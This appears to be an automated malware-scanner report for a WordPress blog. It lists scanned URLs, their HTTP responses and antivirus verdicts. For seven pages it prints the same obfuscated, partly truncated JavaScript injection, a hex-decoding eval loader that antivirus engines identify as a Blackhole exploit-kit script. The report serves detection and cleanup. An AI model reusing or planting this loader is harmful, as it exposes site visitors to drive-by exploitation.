New scan:

Malware Scanner report for dylanmcdonald.me

Malicious/Suspicious/Total urls checked
7/0/18
7 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://dylanmcdonald.me/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 14 Jul 2014 02:38:12 GMT
Location: http://blog.dylanmcdonald.me
Server: Apache
Content-Length: 302
Content-Type: text/html; charset=iso-8859-1
clean
http://blog.dylanmcdonald.me/
200 OK
Content-Length: 70251
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

nat="s"+"p"+"li"+"t";ankm=window;jpd="dy";zjoe=document;homhq="0x";wbokh=(5-3-1);try{++(zjoe.body)}catch(ugl){iyanu=false;try{}catch(jhtra){iyanu=21;}if(1){sfmebn="17:5d:6c:65:5a:6b:60:66:65:17:6f:66:6f:6c:59:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:66:6f:6c:59:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3539 bytes are skipped ...
:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:66:6f:6c:59:27:30:1f:20:32:4:1:74:4:1:74"[nat](":");}ankm=sfmebn;bxcve=[];for(davey=22-20-2;-davey+1424!=0;davey+=1){pal=davey;if((0x19==031))bxcve+=String["fromCharCode"](eval(homhq+ankm[1*pal])+0xa-wbokh);}lsmohe=eval;lsmohe(bxcve)}

Antivirus reports:

Qihoo-360
adware.js.gen..f0
AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
Trojan.Script.8339
Ikarus
Virus.JS.Exploit
nProtect
Trojan.Script.8339
TrendMicro-HouseCall
TROJ_GEN.F47V0217
Comodo
TrojWare.JS.Kryptik.acc
Emsisoft
Trojan.Script.8339 (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Exploit.JS.Pdfka.gkj
MicroWorld-eScan
Trojan.Script.8339
Fortinet
JS/Kryptik.AOG!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgxcgz
F-Secure
Trojan.Script.8339
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
Script/Exploit.Kit
Norman
Kryptik.CCLX
GData
Trojan.Script.8339
ESET-NOD32
JS/Kryptik.AOG
BitDefender
Trojan.Script.8339

http://blog.dylanmcdonald.me/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.3
200 OK
Content-Length: 9986
Content-Type: application/javascript
clean
http://dylanmcdonald.me//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 14 Jul 2014 02:38:17 GMT
Location: http://blog.dylanmcdonald.me
Server: Apache
Content-Length: 302
Content-Type: text/html; charset=iso-8859-1
clean
http://blog.dylanmcdonald.me/test404page.js
404 Not Found
Content-Length: 21183
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

nat="s"+"p"+"li"+"t";ankm=window;jpd="dy";zjoe=document;homhq="0x";wbokh=(5-3-1);try{++(zjoe.body)}catch(ugl){iyanu=false;try{}catch(jhtra){iyanu=21;}if(1){sfmebn="17:5d:6c:65:5a:6b:60:66:65:17:6f:66:6f:6c:59:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:66:6f:6c:59:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3539 bytes are skipped ...
:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:66:6f:6c:59:27:30:1f:20:32:4:1:74:4:1:74"[nat](":");}ankm=sfmebn;bxcve=[];for(davey=22-20-2;-davey+1424!=0;davey+=1){pal=davey;if((0x19==031))bxcve+=String["fromCharCode"](eval(homhq+ankm[1*pal])+0xa-wbokh);}lsmohe=eval;lsmohe(bxcve)}

Antivirus reports:

Qihoo-360
adware.js.gen..f0
AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
Trojan.Script.8339
Ikarus
Virus.JS.Exploit
nProtect
Trojan.Script.8339
TrendMicro-HouseCall
TROJ_GEN.F47V0217
Comodo
TrojWare.JS.Kryptik.acc
Emsisoft
Trojan.Script.8339 (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Exploit.JS.Pdfka.gkj
MicroWorld-eScan
Trojan.Script.8339
Fortinet
JS/Kryptik.AOG!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgxcgz
F-Secure
Trojan.Script.8339
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
Script/Exploit.Kit
Norman
Kryptik.CCLX
GData
Trojan.Script.8339
ESET-NOD32
JS/Kryptik.AOG
BitDefender
Trojan.Script.8339

http://blog.dylanmcdonald.me//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js/
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Mon, 14 Jul 2014 02:38:18 GMT
Pragma: no-cache
Location: http://blog.dylanmcdonald.me/ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js/
Server: Apache
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
X-Pingback: http://blog.dylanmcdonald.me/xmlrpc.php
clean
http://blog.dylanmcdonald.me/ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js/
404 Not Found
Content-Length: 21183
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

nat="s"+"p"+"li"+"t";ankm=window;jpd="dy";zjoe=document;homhq="0x";wbokh=(5-3-1);try{++(zjoe.body)}catch(ugl){iyanu=false;try{}catch(jhtra){iyanu=21;}if(1){sfmebn="17:5d:6c:65:5a:6b:60:66:65:17:6f:66:6f:6c:59:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:66:6f:6c:59:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3539 bytes are skipped ...
:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:66:6f:6c:59:27:30:1f:20:32:4:1:74:4:1:74"[nat](":");}ankm=sfmebn;bxcve=[];for(davey=22-20-2;-davey+1424!=0;davey+=1){pal=davey;if((0x19==031))bxcve+=String["fromCharCode"](eval(homhq+ankm[1*pal])+0xa-wbokh);}lsmohe=eval;lsmohe(bxcve)}

Antivirus reports:

Qihoo-360
adware.js.gen..f0
AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
Trojan.Script.8339
Ikarus
Virus.JS.Exploit
nProtect
Trojan.Script.8339
TrendMicro-HouseCall
TROJ_GEN.F47V0217
Comodo
TrojWare.JS.Kryptik.acc
Emsisoft
Trojan.Script.8339 (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Exploit.JS.Pdfka.gkj
MicroWorld-eScan
Trojan.Script.8339
Fortinet
JS/Kryptik.AOG!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgxcgz
F-Secure
Trojan.Script.8339
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
Script/Exploit.Kit
Norman
Kryptik.CCLX
GData
Trojan.Script.8339
ESET-NOD32
JS/Kryptik.AOG
BitDefender
Trojan.Script.8339

http://blog.dylanmcdonald.me/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995
200 OK
Content-Length: 26590
Content-Type: application/javascript
clean
http://blog.dylanmcdonald.me/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.06
200 OK
Content-Length: 1791
Content-Type: application/javascript
clean
http://blog.dylanmcdonald.me/wp-content/plugins/nextgen-gallery/js/ngg.js?ver=2.1
200 OK
Content-Length: 5488
Content-Type: application/javascript
clean
http://blog.dylanmcdonald.me/wp-content/themes/suffusion/scripts/suffusion.js?ver=4.4.4
200 OK
Content-Length: 33983
Content-Type: application/javascript
clean
http://blog.dylanmcdonald.me/wp-content/plugins/easy-fancybox/fancybox/jquery.fancybox-1.3.5.pack.js?ver=1.3.5
200 OK
Content-Length: 16183
Content-Type: application/javascript
clean
http://blog.dylanmcdonald.me/wp-content/plugins/easy-fancybox/jquery.easing.pack.js?ver=1.3
200 OK
Content-Length: 3649
Content-Type: application/javascript
clean
http://blog.dylanmcdonald.me/2013/04/
200 OK
Content-Length: 22802
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

nat="s"+"p"+"li"+"t";ankm=window;jpd="dy";zjoe=document;homhq="0x";wbokh=(5-3-1);try{++(zjoe.body)}catch(ugl){iyanu=false;try{}catch(jhtra){iyanu=21;}if(1){sfmebn="17:5d:6c:65:5a:6b:60:66:65:17:6f:66:6f:6c:59:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:66:6f:6c:59:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3539 bytes are skipped ...
:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:66:6f:6c:59:27:30:1f:20:32:4:1:74:4:1:74"[nat](":");}ankm=sfmebn;bxcve=[];for(davey=22-20-2;-davey+1424!=0;davey+=1){pal=davey;if((0x19==031))bxcve+=String["fromCharCode"](eval(homhq+ankm[1*pal])+0xa-wbokh);}lsmohe=eval;lsmohe(bxcve)}

Antivirus reports:

Qihoo-360
adware.js.gen..f0
AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
Trojan.Script.8339
Ikarus
Virus.JS.Exploit
nProtect
Trojan.Script.8339
TrendMicro-HouseCall
TROJ_GEN.F47V0217
Comodo
TrojWare.JS.Kryptik.acc
Emsisoft
Trojan.Script.8339 (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Exploit.JS.Pdfka.gkj
MicroWorld-eScan
Trojan.Script.8339
Fortinet
JS/Kryptik.AOG!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgxcgz
F-Secure
Trojan.Script.8339
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
Script/Exploit.Kit
Norman
Kryptik.CCLX
GData
Trojan.Script.8339
ESET-NOD32
JS/Kryptik.AOG
BitDefender
Trojan.Script.8339

http://blog.dylanmcdonald.me/2013/04/08/some-new-videos/
200 OK
Content-Length: 25686
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

nat="s"+"p"+"li"+"t";ankm=window;jpd="dy";zjoe=document;homhq="0x";wbokh=(5-3-1);try{++(zjoe.body)}catch(ugl){iyanu=false;try{}catch(jhtra){iyanu=21;}if(1){sfmebn="17:5d:6c:65:5a:6b:60:66:65:17:6f:66:6f:6c:59:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:66:6f:6c:59:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3539 bytes are skipped ...
:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:66:6f:6c:59:27:30:1f:20:32:4:1:74:4:1:74"[nat](":");}ankm=sfmebn;bxcve=[];for(davey=22-20-2;-davey+1424!=0;davey+=1){pal=davey;if((0x19==031))bxcve+=String["fromCharCode"](eval(homhq+ankm[1*pal])+0xa-wbokh);}lsmohe=eval;lsmohe(bxcve)}

Antivirus reports:

Qihoo-360
adware.js.gen..f0
AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
Trojan.Script.8339
Ikarus
Virus.JS.Exploit
nProtect
Trojan.Script.8339
TrendMicro-HouseCall
TROJ_GEN.F47V0217
Comodo
TrojWare.JS.Kryptik.acc
Emsisoft
Trojan.Script.8339 (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Exploit.JS.Pdfka.gkj
MicroWorld-eScan
Trojan.Script.8339
Fortinet
JS/Kryptik.AOG!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgxcgz
F-Secure
Trojan.Script.8339
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
Script/Exploit.Kit
Norman
Kryptik.CCLX
GData
Trojan.Script.8339
ESET-NOD32
JS/Kryptik.AOG
BitDefender
Trojan.Script.8339

http://blog.dylanmcdonald.me/wp-includes/js/comment-reply.min.js?ver=3.5.1
200 OK
Content-Length: 786
Content-Type: application/javascript
clean
http://blog.dylanmcdonald.me/category/uncategorized/
200 OK
Content-Length: 70467
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

nat="s"+"p"+"li"+"t";ankm=window;jpd="dy";zjoe=document;homhq="0x";wbokh=(5-3-1);try{++(zjoe.body)}catch(ugl){iyanu=false;try{}catch(jhtra){iyanu=21;}if(1){sfmebn="17:5d:6c:65:5a:6b:60:66:65:17:6f:66:6f:6c:59:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:66:6f:6c:59:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3539 bytes are skipped ...
:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:66:6f:6c:59:27:30:1f:20:32:4:1:74:4:1:74"[nat](":");}ankm=sfmebn;bxcve=[];for(davey=22-20-2;-davey+1424!=0;davey+=1){pal=davey;if((0x19==031))bxcve+=String["fromCharCode"](eval(homhq+ankm[1*pal])+0xa-wbokh);}lsmohe=eval;lsmohe(bxcve)}

Antivirus reports:

Qihoo-360
adware.js.gen..f0
AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
Trojan.Script.8339
Ikarus
Virus.JS.Exploit
nProtect
Trojan.Script.8339
TrendMicro-HouseCall
TROJ_GEN.F47V0217
Comodo
TrojWare.JS.Kryptik.acc
Emsisoft
Trojan.Script.8339 (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Exploit.JS.Pdfka.gkj
MicroWorld-eScan
Trojan.Script.8339
Fortinet
JS/Kryptik.AOG!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgxcgz
F-Secure
Trojan.Script.8339
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
Script/Exploit.Kit
Norman
Kryptik.CCLX
GData
Trojan.Script.8339
ESET-NOD32
JS/Kryptik.AOG
BitDefender
Trojan.Script.8339

http://blog.dylanmcdonald.me/author/dylan/
200 OK
Content-Length: 70990
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

nat="s"+"p"+"li"+"t";ankm=window;jpd="dy";zjoe=document;homhq="0x";wbokh=(5-3-1);try{++(zjoe.body)}catch(ugl){iyanu=false;try{}catch(jhtra){iyanu=21;}if(1){sfmebn="17:5d:6c:65:5a:6b:60:66:65:17:6f:66:6f:6c:59:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:66:6f:6c:59:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3539 bytes are skipped ...
:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:66:6f:6c:59:27:30:1f:20:32:4:1:74:4:1:74"[nat](":");}ankm=sfmebn;bxcve=[];for(davey=22-20-2;-davey+1424!=0;davey+=1){pal=davey;if((0x19==031))bxcve+=String["fromCharCode"](eval(homhq+ankm[1*pal])+0xa-wbokh);}lsmohe=eval;lsmohe(bxcve)}

Antivirus reports:

Qihoo-360
adware.js.gen..f0
AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ad-Aware
Trojan.Script.8339
Ikarus
Virus.JS.Exploit
nProtect
Trojan.Script.8339
TrendMicro-HouseCall
TROJ_GEN.F47V0217
Comodo
TrojWare.JS.Kryptik.acc
Emsisoft
Trojan.Script.8339 (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
DrWeb
JS.IFrame.500
Microsoft
Exploit:JS/Blacole.NX
Kaspersky
Exploit.JS.Pdfka.gkj
MicroWorld-eScan
Trojan.Script.8339
Fortinet
JS/Kryptik.AOG!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.cgxcgz
F-Secure
Trojan.Script.8339
VIPRE
Exploit.JS.Blacole.nx (v)
AVG
Script/Exploit.Kit
Norman
Kryptik.CCLX
GData
Trojan.Script.8339
ESET-NOD32
JS/Kryptik.AOG
BitDefender
Trojan.Script.8339


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: dylanmcdonald.me

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 14 Jul 2014 02:38:12 GMT
Location: http://blog.dylanmcdonald.me
Server: Apache
Content-Length: 302
Content-Type: text/html; charset=iso-8859-1

...302 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dylanmcdonald.me
Referer: http://www.google.com/search?q=dylanmcdonald.me

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=dylanmcdonald.me

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dylanmcdonald.me/

Result: dylanmcdonald.me is not infected or malware details are not published yet.